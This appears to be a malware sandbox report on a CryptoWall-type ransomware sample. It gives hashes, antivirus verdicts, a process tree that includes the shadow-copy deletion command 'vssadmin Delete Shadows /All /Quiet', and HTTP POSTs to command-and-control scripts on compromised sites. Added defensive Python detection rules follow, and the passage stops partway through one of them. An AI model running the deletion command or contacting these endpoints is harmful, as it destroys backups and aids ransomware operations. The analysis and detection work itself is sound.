Analysis Date: 2015-10-11 13:54:50
MD5: 7504279e2add1641ece6b780a0ce9919
SHA1: bd0c3ca94278b0024b58393ead39a0ae032fb5c7

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 30c918fbbc946cce2179909ea65a89fd sha1: e4bdc696ff9db0e989e1f618b1e72ae753ef4d16 size: 39424
Section .rdata: md5: 1e30a24ddc54a64de3d5f30b0a27bdbc sha1: d0d1cda9d9aec336ba0a2d716468eacdfd12b859 size: 9216
Section .data: md5: c08b4ee71d8aab6ba3537609d89a94bd sha1: 37970bd87c2188049e2918de8b1eba19918499d6 size: 4096
Section .fggd: md5: 63a3ff14c18817e837bd4e98abb3ea7f sha1: 2d65c046ef7e4a9ea412cd01cd689411265e10ed size: 86528
Section .hgse: md5: 139910683aaf26252378123e6d249021 sha1: d272efe6f89d154d66af9b8a58a64040dc825049 size: 5632
Section .rsrc: md5: ff5306cce9f67a0150db41493ef5290d sha1: 5c375e6351f1e89f967c78a59fe6653bb263e7a6 size: 1024
Section .reloc: md5: 15f2bc9cc00d5328ec08e1a4192f5f3d sha1: d6ad71c2622ba004eb92f335834c4222e8e62fc4 size: 4096
Timestamp: 2015-09-20 10:45:07
Version: CompanyName: serdjgheru
Packer: Microsoft Visual C++ ?.?
PEhash: 23c1e4ae288c3af17034c0170516ef28cbe0f2c8
IMPhash: 9a0b622db4d13d8c51c2434b257a0f4b
AV Rising: no_virus
AV Mcafee: Gamarue-FCX!7504279E2ADD
AV Avira (antivir): TR/Crypt.Xpack.280574
AV Twister: no_virus
AV Ad-Aware: Gen:Variant.Mikey.24858
AV Alwil (avast): no_virus
AV Eset (nod32): Win32/Kryptik.DXSG
AV Grisoft (avg): Crypt4.CLDF
AV Symantec: no_virus
AV Fortinet: W32/Generic.AC.2879014
AV BitDefender: Gen:Variant.Mikey.24858
AV K7: Trojan ( 004cf8d21 )
AV Microsoft Security Essentials: Ransom:Win32/Crowti!rfn
AV MicroWorld (escan): Gen:Variant.Mikey.24858
AV MalwareBytes: Ransom.CryptoWall
AV Authentium: W32/S-177bdd36!Eldorado
AV Frisk (f-prot): no_virus
AV Ikarus: Virus.Win32.Cryptor
AV Emsisoft: Gen:Variant.Mikey.24858
AV Zillya!: no_virus
AV Kaspersky: Trojan.Win32.Generic
AV Trend Micro: Ransom_.0A217DD0
AV CAT (quickheal): no_virus
AV VirusBlokAda (vba32): no_virus
AV Padvish: Trojan.Win32.FakeSysDef.OE
AV BullGuard: Gen:Variant.Mikey.24858
AV Arcabit (arcavir): Gen:Variant.Mikey.24858
AV ClamAV: no_virus
AV Dr. Web: no_virus
AV F-Secure: Gen:Variant.Mikey.24858
AV CA (E-Trust Ino): no_virus

Runtime Details:

Process
↳ C:\malware.exe

Creates Process: C:\WINDOWS\explorer.exe

Process
↳ C:\WINDOWS\explorer.exe

Creates File: C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\6ff06165.exe
Creates File: C:\6ff06165\6ff06165.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\6ff06165.exe
Creates Process: -k netsvcs
Creates Process: vssadmin.exe Delete Shadows /All /Quiet

Process
↳ -k netsvcs

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: slaughtertime.com
Winsock DNS: misja52.com
Winsock DNS: leicesterholmeproject.co.uk
Winsock DNS: evolvingcareers.co.uk
Winsock DNS: hechtelshobbycenter.be
Winsock DNS: reynelgonzalez.com
Winsock DNS: fundmymission.org
Winsock DNS: eshraqatee.com
Winsock DNS: veloelectric.com.au
Winsock DNS: zeitcreative.com
Winsock DNS: sabeehah.com
Winsock DNS: hhydrovac.ca
Winsock DNS: fan-out.com
Winsock DNS: mineralesdelsur.com
Winsock DNS: curlmyip.com
Winsock DNS: deicapelli.it
Winsock DNS: intellicus.com
Winsock DNS: foundersomaha.net
Winsock DNS: fabconcepts.net
Winsock DNS: geopowercables.com
Winsock DNS: myexternalip.com
Winsock DNS: goodtalk.info
Winsock DNS: ftpsecurityservices.com
Winsock DNS: koerper-modellage.de
Winsock DNS: linkcorphk.com
Winsock DNS: ip-addr.es
Winsock DNS: spoilrotn.com
Winsock DNS: medicalmarijuanamiamiflorida.com
Winsock DNS: ewineco.com
Winsock DNS: externalbatterycase.com
Winsock DNS: especializaciondigital.com
Winsock DNS: buonatale.com
Winsock DNS: hurt911morrow.com
Winsock DNS: monarchestatemanagement.com
Winsock DNS: medulaosea.net
Winsock DNS: georgiainjurycenters.com
Winsock DNS: snakebid.com
Winsock DNS: hagginhosp.com
Winsock DNS: smkcpaky.com
Winsock DNS: headline365.com
Winsock DNS: chicanoymenarguez.com
Winsock DNS: greenevap.com
Winsock DNS: royalworldtours.in
Winsock DNS: truereno.com
Winsock DNS: foxycalendargirls.com

Process
↳ vssadmin.exe Delete Shadows /All /Quiet

Creates File: PIPE\lsarpc
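The process tree above is the part of this report that turns directly into host detections: malware.exe starts a second explorer.exe, that explorer.exe drops three copies of an eight-hex-character .exe (into the Startup folder, Application Data and a same-named directory under C:\), then launches a service host with -k netsvcs and runs vssadmin.exe Delete Shadows /All /Quiet before anything is encrypted. The Python below is an added example, not sandbox output or any vendor's rule set: it replays constructed Sysmon-style process-create and file-create records through four rules and returns what fires. The PIDs, the parent of malware.exe, the svchost.exe image name behind the sandbox's bare "-k netsvcs", and the benign control records are invented; the remaining paths and command lines are copied from the report. The shadow-copy rule is generalised beyond the page to also match wmic shadowcopy delete.

```python
import ntpath
import re

# Constructed records modelled on Sysmon Event ID 1 (process create) and
# Event ID 11 (file create). Field names are this example's own. PIDs, the
# parent of malware.exe, the svchost.exe image behind the sandbox's bare
# "-k netsvcs", and the benign control records are invented; the remaining
# paths and command lines are copied from the sandbox report.
EVENTS = [
    {"kind": "process", "pid": 1000, "parent_image": r"C:\Documents and Settings\Administrator\Desktop\cmd.exe",
     "image": r"C:\malware.exe", "cmdline": r"C:\malware.exe"},
    {"kind": "process", "pid": 1001, "parent_image": r"C:\malware.exe",
     "image": r"C:\WINDOWS\explorer.exe", "cmdline": r"C:\WINDOWS\explorer.exe"},
    {"kind": "file", "pid": 1001, "image": r"C:\WINDOWS\explorer.exe",
     "target": r"C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\6ff06165.exe"},
    {"kind": "file", "pid": 1001, "image": r"C:\WINDOWS\explorer.exe",
     "target": r"C:\6ff06165\6ff06165.exe"},
    {"kind": "file", "pid": 1001, "image": r"C:\WINDOWS\explorer.exe",
     "target": r"C:\Documents and Settings\Administrator\Application Data\6ff06165.exe"},
    {"kind": "process", "pid": 1002, "parent_image": r"C:\WINDOWS\explorer.exe",
     "image": r"C:\WINDOWS\system32\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"kind": "process", "pid": 1003, "parent_image": r"C:\WINDOWS\explorer.exe",
     "image": r"C:\WINDOWS\system32\vssadmin.exe", "cmdline": "vssadmin.exe Delete Shadows /All /Quiet"},
    # Benign controls that must not fire.
    {"kind": "process", "pid": 1004, "parent_image": r"C:\WINDOWS\explorer.exe",
     "image": r"C:\WINDOWS\system32\notepad.exe", "cmdline": "notepad.exe"},
    {"kind": "file", "pid": 1004, "image": r"C:\WINDOWS\system32\notepad.exe",
     "target": r"C:\Documents and Settings\Administrator\My Documents\notes.txt"},
    {"kind": "process", "pid": 1005, "parent_image": r"C:\WINDOWS\system32\services.exe",
     "image": r"C:\WINDOWS\system32\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
]

# vssadmin "Delete Shadows" is what the report shows; "wmic shadowcopy delete"
# is the other common spelling and is added here as a generalisation.
SHADOW_DELETE = re.compile(r"\bdelete\s+shadows\b|\bshadowcopy\s+delete\b", re.I)
RANDOM_EXE = re.compile(r"^[0-9a-f]{8}\.exe$", re.I)
PERSIST_DIRS = ("\\start menu\\programs\\startup\\", "\\application data\\")
EXPLORER_PARENTS = {"userinit.exe", "winlogon.exe", "explorer.exe"}  # normal parents of explorer.exe


def base(path):
    """Lower-cased final path component; ntpath handles Windows paths on any OS."""
    return ntpath.basename(path).lower()


def triage(events):
    """Return (rule, pid, detail) for every record matching one of four rules
    derived from the sandbox process tree."""
    hits = []
    for ev in events:
        if ev["kind"] == "process":
            img, parent, cmd = base(ev["image"]), base(ev["parent_image"]), ev["cmdline"]
            # malware.exe starting explorer.exe: a second explorer, not the shell
            if img == "explorer.exe" and parent not in EXPLORER_PARENTS:
                hits.append(("explorer_spawned_by_unexpected_parent", ev["pid"], parent))
            # a service host launched by explorer.exe (services.exe is the normal parent)
            if "-k netsvcs" in cmd.lower() and parent == "explorer.exe":
                hits.append(("service_host_spawned_by_explorer", ev["pid"], cmd))
            # shadow-copy deletion ahead of encryption
            if img in ("vssadmin.exe", "wmic.exe") and SHADOW_DELETE.search(cmd):
                hits.append(("shadow_copy_deletion", ev["pid"], cmd))
        elif ev["kind"] == "file":
            target = ev["target"]
            name = base(target)
            parent_dir = base(ntpath.dirname(target))
            in_persist_dir = any(d in target.lower() for d in PERSIST_DIRS)
            # 8-hex-char .exe written to Startup, Application Data, or C:\<same name>\
            if RANDOM_EXE.match(name) and (in_persist_dir or parent_dir == name[:-4]):
                hits.append(("random_named_exe_dropped", ev["pid"], target))
    return hits


if __name__ == "__main__":
    for rule, pid, detail in triage(EVENTS):
        print(f"{rule:40} pid={pid} {detail}")
```

Run against the constructed records this reports six hits (one unexpected explorer.exe parent, three dropped copies of 6ff06165.exe, the netsvcs host under explorer.exe, and the vssadmin deletion) and nothing for the notepad.exe or services.exe controls. The shadow-copy rule is the one to alert on with the highest priority: on a real host it runs seconds before encryption starts.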

Network Details:

DNS A: ip-addr.es ➝ 188.165.164.184
DNS A: myexternalip.com ➝ 78.47.139.102
DNS A: curlmyip.com ➝ 184.106.112.172
DNS A: ewineco.com ➝ 192.186.235.6
DNS A: slaughtertime.com ➝ 173.234.209.98
DNS A: linkcorphk.com ➝ 188.121.47.1
DNS A: intellicus.com ➝ 216.38.129.210
DNS A: especializaciondigital.com ➝ 192.254.233.175
DNS A: hechtelshobbycenter.be ➝ 62.182.61.62
DNS A: goodtalk.info ➝ 128.140.220.8
DNS A: sabeehah.com ➝ 188.121.47.1
DNS A: evolvingcareers.co.uk ➝ 188.121.47.1
DNS A: georgiainjurycenters.com ➝ 184.168.19.1
DNS A: hurt911morrow.com ➝ 184.168.19.1
DNS A: leicesterholmeproject.co.uk ➝ 188.121.47.1
DNS A: eshraqatee.com ➝ 107.180.4.26
DNS A: chicanoymenarguez.com ➝ 185.14.56.94
DNS A: hagginhosp.com ➝ 184.168.26.1
DNS A: royalworldtours.in ➝ 192.232.219.235
DNS A: mineralesdelsur.com ➝ 192.254.233.175
DNS A: externalbatterycase.com ➝ 192.186.222.229
DNS A: truereno.com ➝ 69.163.208.246
DNS A: hhydrovac.ca ➝ 107.180.44.135
DNS A: koerper-modellage.de ➝ 87.106.167.110
DNS A: geopowercables.com ➝ 107.180.44.125
DNS A: greenevap.com ➝ 50.63.95.1
DNS A: veloelectric.com.au ➝ 106.187.103.246
DNS A: headline365.com ➝ 173.234.209.98
DNS A: foxycalendargirls.com ➝ 192.254.186.154
DNS A: monarchestatemanagement.com ➝ 72.167.131.9
DNS A: buonatale.com ➝ 80.88.88.152
DNS A: ftpsecurityservices.com ➝ 107.180.26.90
DNS A: fan-out.com ➝ 50.62.245.1
DNS A: fabconcepts.net ➝ 107.180.4.133
DNS A: misja52.com ➝ 178.255.42.139
DNS A: deicapelli.it ➝ 62.149.226.198
DNS A: smkcpaky.com ➝ 50.62.69.1
DNS A: spoilrotn.com ➝ 184.168.19.1
DNS A: medicalmarijuanamiamiflorida.com ➝ 50.62.104.1
DNS A: foundersomaha.net ➝ 50.63.42.1
DNS A: zeitcreative.com ➝ 192.185.48.135
DNS A: snakebid.com ➝ 69.197.163.146
DNS A: fundmymission.org ➝ 184.168.221.44
DNS A: reynelgonzalez.com ➝ 192.254.233.175
DNS A: medulaosea.net ➝ (no address recorded)
User-Agent on every request below: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://ip-addr.es/
HTTP GET: http://myexternalip.com/raw
HTTP GET: http://curlmyip.com/
HTTP POST: http://ewineco.com/wp-admin/network/ap5.php?e=scbr49gz3uf
HTTP POST: http://slaughtertime.com/wp-content/themes/blogoma/inc/blogoma-admin/options/validation/str_replace/3.php?k=scbr49gz3uf
HTTP POST: http://linkcorphk.com/js-js/5.php?w=scbr49gz3uf
HTTP POST: http://intellicus.com/wp-content/uploads/gravity_forms/6-55cd98d82aec1ece039f3a32332929d1/tmp/3.php?b=scbr49gz3uf
HTTP POST: http://especializaciondigital.com/new/wp-includes/js/jcrop/5.php?h=scbr49gz3uf
HTTP POST: http://hechtelshobbycenter.be/components/com_jce/editor/tiny_mce/plugins/mediamanager/classes/getid3/2.php?s=scbr49gz3uf
HTTP POST: http://goodtalk.info/Wp/wp-content/plugins/wp-wizard-cloak/static/js/jquery/farbtastic/5.php?r=scbr49gz3uf
HTTP POST: http://sabeehah.com/images/Image/2.php?a=scbr49gz3uf
HTTP POST: http://evolvingcareers.co.uk/images/prettyPhoto/light_square/4.php?r=scbr49gz3uf
HTTP POST: http://georgiainjurycenters.com/backups_georgia/back%2007102014/ap4.php?j=scbr49gz3uf
HTTP POST: http://hurt911morrow.com/wp-content/uploads/2013/12/2.php?q=scbr49gz3uf
HTTP POST: http://leicesterholmeproject.co.uk/js-js/1.php?s=scbr49gz3uf
HTTP POST: http://eshraqatee.com/wp-includes/css/ap1.php?o=scbr49gz3uf
HTTP POST: http://chicanoymenarguez.com/wp-content/plugins/js_composer/assets/css/lib/vc-linecons/fonts/2.php?f=scbr49gz3uf
HTTP POST: http://hagginhosp.com/hagg2013/wp-includes/theme-compat/ap3.php?g=scbr49gz3uf
HTTP POST: http://royalworldtours.in/js/2.php?j=scbr49gz3uf
HTTP POST: http://mineralesdelsur.com/wp-includes/js/jcrop/2.php?o=scbr49gz3uf
HTTP POST: http://externalbatterycase.com/wp-admin/js/ap4.php?v=scbr49gz3uf
HTTP POST: http://truereno.com/flamingo/wp-content/plugins/jetpack/modules/shortcodes/css/rtl/2.php?u=scbr49gz3uf
HTTP POST: http://hhydrovac.ca/ap1.php?n=scbr49gz3uf
HTTP POST: http://koerper-modellage.de/phpSitemapNG/inc/gsgxml/4.php?j=scbr49gz3uf
HTTP POST: http://mineralesdelsur.com/wp-includes/js/jcrop/3.php?l=scbr49gz3uf
HTTP POST: http://geopowercables.com/wp-admin/user/ap1.php?f=scbr49gz3uf
HTTP POST: http://greenevap.com/mtqzpa/templates/ap5.php?u=scbr49gz3uf
HTTP POST: http://veloelectric.com.au/wp-includes/js/tinymce/skins/wordpress/images/1.php?h=scbr49gz3uf
HTTP POST: http://headline365.com/heelziggler.com/wp-content/plugins/siteorigin-panels/widgets/widgets/call-to-action/presets/1.php?b=scbr49gz3uf
HTTP POST: http://foxycalendargirls.com/wp-content/plugins/jetpack/modules/publicize/assets/rtl/4.php?e=scbr49gz3uf
HTTP POST: http://monarchestatemanagement.com/m/images/1.php?b=scbr49gz3uf
HTTP POST: http://buonatale.com/ilario_bordoni/assets/images/1.php?y=scbr49gz3uf
HTTP POST: http://ftpsecurityservices.com/wp-admin/images/ap2.php?f=scbr49gz3uf
HTTP POST: http://fan-out.com/wp-includes/fonts/ap5.php?g=scbr49gz3uf
HTTP POST: http://fabconcepts.net/wp-content/plugins/indonez-shortcodes/js/ap3.php?m=scbr49gz3uf
HTTP POST: http://misja52.com/wp-content/plugins/iphorm-form-builder/js/jqueryui/themes/blitzer/images/1.php?o=scbr49gz3uf
HTTP POST: http://deicapelli.it/wp-content/plugins/wordpress-seo/vendor/composer/installers/tests/Composer/3.php?a=scbr49gz3uf
HTTP POST: http://smkcpaky.com/pdf/3.php?o=scbr49gz3uf
HTTP POST: http://spoilrotn.com/4.php?j=scbr49gz3uf
HTTP POST: http://medicalmarijuanamiamiflorida.com/4.php?g=scbr49gz3uf
HTTP POST: http://foundersomaha.net/wp-includes/Text/Diff/Renderer/ap3.php?z=scbr49gz3uf
HTTP POST: http://zeitcreative.com/cgi-bin/3.php?k=scbr49gz3uf
HTTP POST: http://evolvingcareers.co.uk/images/prettyPhoto/light_square/ap1.php?b=scbr49gz3uf
HTTP POST: http://snakebid.com/wp-content/themes/point/options/fields/radio/4.php?a=scbr49gz3uf
HTTP POST: http://fundmymission.org/wp-includes/theme-compat/ap5.php?e=scbr49gz3uf
HTTP POST: http://reynelgonzalez.com/compras/image/data/1.php?e=scbr49gz3uf
HTTP GET: http://ip-addr.es/
HTTP GET: http://myexternalip.com/raw
HTTP GET: http://curlmyip.com/
HTTP POST: http://ewineco.com/wp-admin/network/ap5.php?c=u6da3d26yzj
HTTP POST: http://slaughtertime.com/wp-content/themes/blogoma/inc/blogoma-admin/options/validation/str_replace/3.php?e=u6da3d26yzj
HTTP POST: http://linkcorphk.com/js-js/5.php?n=u6da3d26yzj
HTTP POST: http://intellicus.com/wp-content/uploads/gravity_forms/6-55cd98d82aec1ece039f3a32332929d1/tmp/3.php?d=u6da3d26yzj
HTTP POST: http://especializaciondigital.com/new/wp-includes/js/jcrop/5.php?d=u6da3d26yzj
HTTP POST: http://hechtelshobbycenter.be/components/com_jce/editor/tiny_mce/plugins/mediamanager/classes/getid3/2.php?n=u6da3d26yzj
HTTP POST: http://goodtalk.info/Wp/wp-content/plugins/wp-wizard-cloak/static/js/jquery/farbtastic/5.php?o=u6da3d26yzj
HTTP POST: http://sabeehah.com/images/Image/2.php?h=u6da3d26yzj
HTTP POST: http://evolvingcareers.co.uk/images/prettyPhoto/light_square/4.php?j=u6da3d26yzj
HTTP POST: http://georgiainjurycenters.com/backups_georgia/back%2007102014/ap4.php?f=u6da3d26yzj
HTTP POST: http://hurt911morrow.com/wp-content/uploads/2013/12/2.php?e=u6da3d26yzj
HTTP POST: http://leicesterholmeproject.co.uk/js-js/1.php?u=u6da3d26yzj
HTTP POST: http://eshraqatee.com/wp-includes/css/ap1.php?m=u6da3d26yzj
HTTP POST: http://chicanoymenarguez.com/wp-content/plugins/js_composer/assets/css/lib/vc-linecons/fonts/2.php?u=u6da3d26yzj
HTTP POST: http://hagginhosp.com/hagg2013/wp-includes/theme-compat/ap3.php?s=u6da3d26yzj
HTTP POST: http://royalworldtours.in/js/2.php?i=u6da3d26yzj
HTTP POST: http://mineralesdelsur.com/wp-includes/js/jcrop/2.php?c=u6da3d26yzj
HTTP POST: http://externalbatterycase.com/wp-admin/js/ap4.php?s=u6da3d26yzj
HTTP POST: http://truereno.com/flamingo/wp-content/plugins/jetpack/modules/shortcodes/css/rtl/2.php?k=u6da3d26yzj
HTTP POST: http://hhydrovac.ca/ap1.php?n=u6da3d26yzj
HTTP POST: http://koerper-modellage.de/phpSitemapNG/inc/gsgxml/4.php?h=u6da3d26yzj
HTTP POST: http://mineralesdelsur.com/wp-includes/js/jcrop/3.php?i=u6da3d26yzj
HTTP POST: http://geopowercables.com/wp-admin/user/ap1.php?c=u6da3d26yzj
HTTP POST: http://greenevap.com/mtqzpa/templates/ap5.php?p=u6da3d26yzj
HTTP POST: http://veloelectric.com.au/wp-includes/js/tinymce/skins/wordpress/images/1.php?o=u6da3d26yzj
HTTP POST: http://headline365.com/heelziggler.com/wp-content/plugins/siteorigin-panels/widgets/widgets/call-to-action/presets/1.php?k=u6da3d26yzj
HTTP POST: http://foxycalendargirls.com/wp-content/plugins/jetpack/modules/publicize/assets/rtl/4.php?j=u6da3d26yzj
HTTP POST: http://monarchestatemanagement.com/m/images/1.php?k=u6da3d26yzj
HTTP POST: http://buonatale.com/ilario_bordoni/assets/images/1.php?c=u6da3d26yzj
HTTP POST: http://ftpsecurityservices.com/wp-admin/images/ap2.php?g=u6da3d26yzj
HTTP POST: http://fan-out.com/wp-includes/fonts/ap5.php?r=u6da3d26yzj
HTTP POST: http://fabconcepts.net/wp-content/plugins/indonez-shortcodes/js/ap3.php?u=u6da3d26yzj
HTTP POST: http://misja52.com/wp-content/plugins/iphorm-form-builder/js/jqueryui/themes/blitzer/images/1.php?t=u6da3d26yzj
HTTP POST: http://deicapelli.it/wp-content/plugins/wordpress-seo/vendor/composer/installers/tests/Composer/3.php?x=u6da3d26yzj
HTTP POST: http://smkcpaky.com/pdf/3.php?b=u6da3d26yzj
HTTP POST: http://spoilrotn.com/4.php?x=u6da3d26yzj
HTTP POST: http://medicalmarijuanamiamiflorida.com/4.php?p=u6da3d26yzj
HTTP POST: http://foundersomaha.net/wp-includes/Text/Diff/Renderer/ap3.php?a=u6da3d26yzj
HTTP POST: http://zeitcreative.com/cgi-bin/3.php?a=u6da3d26yzj
HTTP POST: http://evolvingcareers.co.uk/images/prettyPhoto/light_square/ap1.php?f=u6da3d26yzj
HTTP POST: http://snakebid.com/wp-content/themes/point/options/fields/radio/4.php?s=u6da3d26yzj
HTTP POST: http://fundmymission.org/wp-includes/theme-compat/ap5.php?u=u6da3d26yzj
HTTP POST: http://reynelgonzalez.com/compras/image/data/1.php?c=u6da3d26yzj
Flows TCP: 192.168.1.1:1031 ➝ 188.165.164.184:80
Flows TCP: 192.168.1.1:1032 ➝ 78.47.139.102:80
Flows TCP: 192.168.1.1:1033 ➝ 184.106.112.172:80
Flows TCP: 192.168.1.1:1034 ➝ 192.186.235.6:80
Flows TCP: 192.168.1.1:1035 ➝ 173.234.209.98:80
Flows TCP: 192.168.1.1:1036 ➝ 188.121.47.1:80
Flows TCP: 192.168.1.1:1037 ➝ 216.38.129.210:80
Flows TCP: 192.168.1.1:1038 ➝ 192.254.233.175:80
Flows TCP: 192.168.1.1:1039 ➝ 62.182.61.62:80
Flows TCP: 192.168.1.1:1040 ➝ 128.140.220.8:80
Flows TCP: 192.168.1.1:1041 ➝ 188.121.47.1:80
Flows TCP: 192.168.1.1:1042 ➝ 188.121.47.1:80
Flows TCP: 192.168.1.1:1043 ➝ 184.168.19.1:80
Flows TCP: 192.168.1.1:1044 ➝ 184.168.19.1:80
Flows TCP: 192.168.1.1:1045 ➝ 188.121.47.1:80
Flows TCP: 192.168.1.1:1046 ➝ 107.180.4.26:80
Flows TCP: 192.168.1.1:1047 ➝ 185.14.56.94:80
Flows TCP: 192.168.1.1:1048 ➝ 184.168.26.1:80
Flows TCP: 192.168.1.1:1049 ➝ 192.232.219.235:80
Flows TCP: 192.168.1.1:1050 ➝ 192.254.233.175:80
Flows TCP: 192.168.1.1:1051 ➝ 192.186.222.229:80
Flows TCP: 192.168.1.1:1052 ➝ 69.163.208.246:80
Flows TCP: 192.168.1.1:1053 ➝ 107.180.44.135:80
Flows TCP: 192.168.1.1:1054 ➝ 87.106.167.110:80
Flows TCP: 192.168.1.1:1055 ➝ 192.254.233.175:80
Flows TCP: 192.168.1.1:1056 ➝ 107.180.44.125:80
Flows TCP: 192.168.1.1:1057 ➝ 50.63.95.1:80
Flows TCP: 192.168.1.1:1058 ➝ 106.187.103.246:80
Flows TCP: 192.168.1.1:1059 ➝ 173.234.209.98:80
Flows TCP: 192.168.1.1:1060 ➝ 192.254.186.154:80
Flows TCP: 192.168.1.1:1061 ➝ 72.167.131.9:80
Flows TCP: 192.168.1.1:1062 ➝ 80.88.88.152:80
Flows TCP: 192.168.1.1:1063 ➝ 107.180.26.90:80
Flows TCP: 192.168.1.1:1064 ➝ 50.62.245.1:80
Flows TCP: 192.168.1.1:1065 ➝ 107.180.4.133:80
Flows TCP: 192.168.1.1:1066 ➝ 178.255.42.139:80
Flows TCP: 192.168.1.1:1067 ➝ 62.149.226.198:80
Flows TCP: 192.168.1.1:1068 ➝ 50.62.69.1:80
Flows TCP: 192.168.1.1:1069 ➝ 184.168.19.1:80
Flows TCP: 192.168.1.1:1070 ➝ 50.62.104.1:80
Flows TCP: 192.168.1.1:1071 ➝ 50.63.42.1:80
Flows TCP: 192.168.1.1:1072 ➝ 192.185.48.135:80
Flows TCP: 192.168.1.1:1073 ➝ 188.121.47.1:80
Flows TCP: 192.168.1.1:1074 ➝ 69.197.163.146:80
Flows TCP: 192.168.1.1:1075 ➝ 184.168.221.44:80
Flows TCP: 192.168.1.1:1076 ➝ 192.254.233.175:80
Flows TCP: 192.168.1.1:1077 ➝ 188.165.164.184:80
Flows TCP: 192.168.1.1:1078 ➝ 78.47.139.102:80
Flows TCP: 192.168.1.1:1079 ➝ 184.106.112.172:80
Flows TCP: 192.168.1.1:1080 ➝ 192.186.235.6:80
Flows TCP: 192.168.1.1:1081 ➝ 173.234.209.98:80
Flows TCP: 192.168.1.1:1082 ➝ 188.121.47.1:80
Flows TCP: 192.168.1.1:1083 ➝ 216.38.129.210:80
Flows TCP: 192.168.1.1:1084 ➝ 192.254.233.175:80
Flows TCP: 192.168.1.1:1085 ➝ 62.182.61.62:80
Flows TCP: 192.168.1.1:1086 ➝ 128.140.220.8:80
Flows TCP: 192.168.1.1:1087 ➝ 188.121.47.1:80
Flows TCP: 192.168.1.1:1088 ➝ 188.121.47.1:80
Flows TCP: 192.168.1.1:1089 ➝ 184.168.19.1:80
Flows TCP: 192.168.1.1:1090 ➝ 184.168.19.1:80
Flows TCP: 192.168.1.1:1091 ➝ 188.121.47.1:80
Flows TCP: 192.168.1.1:1092 ➝ 107.180.4.26:80
Flows TCP: 192.168.1.1:1093 ➝ 185.14.56.94:80
Flows TCP: 192.168.1.1:1094 ➝ 184.168.26.1:80
Flows TCP: 192.168.1.1:1095 ➝ 192.232.219.235:80
Flows TCP: 192.168.1.1:1096 ➝ 192.254.233.175:80
Flows TCP: 192.168.1.1:1097 ➝ 192.186.222.229:80
Flows TCP: 192.168.1.1:1098 ➝ 69.163.208.246:80
Flows TCP: 192.168.1.1:1099 ➝ 107.180.44.135:80
Flows TCP: 192.168.1.1:1100 ➝ 87.106.167.110:80
Flows TCP: 192.168.1.1:1101 ➝ 192.254.233.175:80
Flows TCP: 192.168.1.1:1102 ➝ 107.180.44.125:80
Flows TCP: 192.168.1.1:1103 ➝ 50.63.95.1:80
Flows TCP: 192.168.1.1:1104 ➝ 106.187.103.246:80
Flows TCP: 192.168.1.1:1105 ➝ 173.234.209.98:80
Flows TCP: 192.168.1.1:1106 ➝ 192.254.186.154:80
Flows TCP: 192.168.1.1:1107 ➝ 72.167.131.9:80
Flows TCP: 192.168.1.1:1108 ➝ 80.88.88.152:80
Flows TCP: 192.168.1.1:1109 ➝ 107.180.26.90:80
Flows TCP: 192.168.1.1:1110 ➝ 50.62.245.1:80
Flows TCP: 192.168.1.1:1111 ➝ 107.180.4.133:80
Flows TCP: 192.168.1.1:1112 ➝ 178.255.42.139:80
Flows TCP: 192.168.1.1:1113 ➝ 62.149.226.198:80
Flows TCP: 192.168.1.1:1114 ➝ 50.62.69.1:80
Flows TCP: 192.168.1.1:1115 ➝ 184.168.19.1:80
Flows TCP: 192.168.1.1:1116 ➝ 50.62.104.1:80
Flows TCP: 192.168.1.1:1117 ➝ 50.63.42.1:80
Flows TCP: 192.168.1.1:1118 ➝ 192.185.48.135:80
Flows TCP: 192.168.1.1:1119 ➝ 188.121.47.1:80
Flows TCP: 192.168.1.1:1120 ➝ 69.197.163.146:80
Flows TCP: 192.168.1.1:1121 ➝ 184.168.221.44:80
Flows TCP: 192.168.1.1:1122 ➝ 192.254.233.175:80
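The network activity above is a two-stage pattern that repeats once: three GETs to public what-is-my-IP services (ip-addr.es, myexternalip.com, curlmyip.com), then POSTs to dozens of compromised WordPress and Joomla sites, each to a script named 1.php to 5.php or ap1.php to ap5.php with a single-letter query key and an 11-character token (scbr49gz3uf in the first round, u6da3d26yzj in the second), all carrying an IE6 on Windows XP User-Agent. The Python below is an added example, not sandbox output or a vendor signature: it parses constructed proxy-log lines and alerts on a client that performs an external-IP lookup and, within five minutes, POSTs in that shape to at least three distinct hosts. The tab-separated log layout, the timestamps and the two benign clients 192.168.1.2 and 192.168.1.3 are invented; the 192.168.1.1 lines copy URLs and User-Agent from the first round above. The five-minute window and the three-host threshold are this example's choices, not values from the report.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qsl, urlsplit

UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"

# Constructed proxy log, one request per line:
#   timestamp <TAB> client <TAB> method <TAB> url <TAB> user-agent
# Timestamps and the clients 192.168.1.2/.3 are invented; the 192.168.1.1
# lines copy URLs and User-Agent from the sandbox report's first round.
LOG = "\n".join([
    "2015-10-11T13:55:01\t192.168.1.1\tGET\thttp://ip-addr.es/\t" + UA,
    "2015-10-11T13:55:02\t192.168.1.1\tGET\thttp://myexternalip.com/raw\t" + UA,
    "2015-10-11T13:55:03\t192.168.1.1\tGET\thttp://curlmyip.com/\t" + UA,
    "2015-10-11T13:55:04\t192.168.1.1\tPOST\thttp://ewineco.com/wp-admin/network/ap5.php?e=scbr49gz3uf\t" + UA,
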